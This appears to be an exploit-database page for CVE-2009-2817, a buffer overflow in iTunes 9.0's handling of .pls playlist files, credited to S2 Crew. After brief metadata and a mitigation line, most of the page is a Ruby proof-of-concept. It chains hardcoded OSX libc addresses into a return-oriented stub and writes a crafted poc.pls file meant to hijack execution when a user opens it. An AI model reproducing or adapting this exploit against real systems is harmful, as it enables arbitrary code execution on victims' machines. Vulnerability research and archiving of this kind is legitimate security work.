header-logo
Suggest Exploit
vendor:
iTunes
by:
S2 Crew [Hungary]
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: iTunes
Affected Version From: 9.0
Affected Version To: 9.0
Patch Exists: YES
Related CWE: CVE-2009-2817
CPE: a:apple:itunes
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-itunes-cve-2009-2817/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OSX 10.5.8, Windows XP SP2
2009

Exploit Title: iTunes .pls file handling buffer overflow

A buffer overflow vulnerability exists in iTunes 9.0 when handling .pls files. An attacker can exploit this vulnerability by crafting a malicious .pls file and convincing the user to open it, resulting in arbitrary code execution.

Mitigation:

Update to the latest version of iTunes to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2
 (/GS flag, DOS)
# CVE: CVE-2009-2817

# Code:

#!/usr/bin/env ruby

SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459

def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
JMP_EAX].pack("V5") +
"X" * 4
end

payload_cmd = "hereisthetrick"
stub = make_exec_payload_from_heap_stub()
ext = "A" * 59
stub = make_exec_payload_from_heap_stub()
exploit = ext + stub + payload_cmd

# pls file format

file = "[playlist]\n"
file += "NumberOfEntries=1\n"
file += "File1=http://1/asdf." + exploit + "\n"
file += "Title1=asdf\n"
file += "Length1=100\n"
file += "Version=2" + '\n'

File.open('poc.pls','w') do |f|
f.puts file
f.close
end

Navigation

Suggest Exploit

Services By CQR